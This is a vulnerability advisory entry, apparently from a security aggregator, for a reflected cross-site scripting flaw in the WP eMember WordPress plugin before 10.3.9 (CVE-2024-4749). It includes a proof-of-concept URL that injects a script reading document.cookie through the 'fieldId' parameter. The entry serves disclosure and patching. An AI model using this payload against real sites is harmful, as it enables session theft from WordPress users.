Lucene search
KauenavarroWPEX-ID:6CC05A33-6592-4D35-8E66-9B6A9884DF7EHistoryMay 14, 2024 - 12:00 a.m.
WP eMember < 10.3.9 - Reflected XSS
2024-05-1400:00:00
kauenavarro
16
wordpress
emember
xss
reflected
security
exploit
update
Description The plugin does not sanitize and escape the “fieldId” parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
https://www.example.com/wp-admin/admin-ajax.php?fieldId=<script>alert(document.cookie)</script>&action=check_nameRelated
nvd
nvd
CVE-2024-4749
2024-06-04 06:15:11
vulnrichment
vulnrichment
CVE-2024-4749 WP eMember < 10.3.9 - Reflected XSS
2024-06-04 06:00:02
wpvulndb
wpvulndb
WP eMember < 10.3.9 - Reflected XSS
2024-05-14 00:00:00
WP eMember < 10.3.9 - Reflected Cross-Site Scripting
2024-05-31 00:00:00
cve
cve
CVE-2024-4749
2024-06-04 06:15:11
cvelist
cvelist
CVE-2024-4749 WP eMember < 10.3.9 - Reflected XSS
2024-06-04 06:00:02
wordfence
wordfence
9.3 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:6CC05A33-6592-4D35-8E66-9B6A9884DF7E